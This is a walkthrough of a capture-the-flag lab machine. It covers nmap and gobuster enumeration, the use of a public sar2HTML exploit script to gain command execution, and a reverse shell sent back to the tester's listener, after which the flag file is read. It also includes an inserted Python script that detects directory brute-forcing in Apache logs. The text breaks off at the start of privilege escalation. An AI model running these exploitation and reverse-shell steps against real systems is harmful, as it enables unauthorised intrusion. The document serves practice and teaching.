Pwned Date - 30th June 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_  256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.35 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/phpinfo.php          (Status: 200) [Size: 95419]
/robots.txt           (Status: 200) [Size: 9]    
/server-status        (Status: 403) [Size: 279]
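
From the defender's side, the gobuster run above leaves a recognisable trace in the Apache access log: one client requesting many distinct paths, most of them answered with 403 or 404. The sketch below is an added example, not part of the original writeup; the log lines are constructed and the thresholds are assumptions to tune for a real site.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: host ident user [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def _line(ip, path, status):
    # Build one constructed access-log line (timestamp and size are placeholders).
    return f'{ip} - - [30/Jun/2022:10:00:01 +0000] "GET {path} HTTP/1.1" {status} 279 "-" "-"'

# Constructed sample: the scanner's requests mirror the paths in the gobuster
# output, plus wordlist misses (404) that gobuster hides but the server logs.
SCAN = [("/.hta", 403), ("/.htaccess", 403), ("/.htpasswd", 403),
        ("/admin", 404), ("/backup", 404), ("/cgi-bin", 404),
        ("/index.html", 200), ("/phpinfo.php", 200), ("/robots.txt", 200),
        ("/server-status", 403)]
NORMAL = [("/index.html", 200), ("/index.html", 200), ("/favicon.ico", 404)]
SAMPLE_LOG = "\n".join(
    [_line("192.168.49.125", p, s) for p, s in SCAN] +
    [_line("192.168.125.77", p, s) for p, s in NORMAL]
)

def find_enumerators(log_text, min_paths=8, min_miss_ratio=0.5):
    """Return {ip: (requests, distinct_paths, miss_ratio)} for clients that
    probe many distinct paths and mostly receive 403/404 responses."""
    stats = defaultdict(lambda: {"paths": set(), "total": 0, "misses": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        s = stats[m["ip"]]
        s["total"] += 1
        s["paths"].add(m["path"])
        if m["status"] in ("403", "404"):
            s["misses"] += 1
    flagged = {}
    for ip, s in stats.items():
        ratio = s["misses"] / s["total"]
        if len(s["paths"]) >= min_paths and ratio >= min_miss_ratio:
            flagged[ip] = (s["total"], len(s["paths"]), round(ratio, 2))
    return flagged

if __name__ == "__main__":
    for ip, (total, paths, ratio) in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {total} requests, {paths} distinct paths, {ratio:.0%} 403/404")
```

A production rule would also bound the count to a time window, since a scan at -t 200 compresses these requests into seconds while normal browsing spreads them out.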

Going to /robots.txt we get this:

[Screenshot: /robots.txt]

Going to /sar2HTML we have this webpage:

[Screenshot: /sar2HTML web page]

Exploitation

I Googled sar2HTML and found many exploits; I found this GitHub repository quite simple to use:

https://github.com/AssassinUKG/sar2HTML

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 
                                                 
Host NOT Vulnerable, Try a new path!!

That doesn't seem to work, so try another path:

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 -pe sar2HTML

The Host Appears Vulnerable, Running a basic shell ...
Enter: 'rs session' for a ReverseShell

$\\cmd> whoami
------- Results -------
www-data

$\\cmd> rs session
No Reverse IP or PORT supplied. Eg: -rip 10.10.10.10:9999
Restart and Try again!!

Running the following and then entering rs session pops up another terminal window for me:

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 -pe sar2HTML -rip 192.168.49.125:9999

The Host Appears Vulnerable, Running a basic shell ...
Enter: 'rs session' for a ReverseShell
$\\cmd> rs session

Now I am on the victim server as user www-data:

connect to [192.168.49.125] from (UNKNOWN) [192.168.125.35] 48596
/bin/sh: 0: can't access tty; job control turned off

$ whoami
www-data

$ cd /home
$ ls
local.txt  love

$ cat local.txt
fa8ddca349c499f8d1800aa016e0627e

Privilege Escalation

Upgrade our shell by running this in the pop-up terminal, with our netcat listening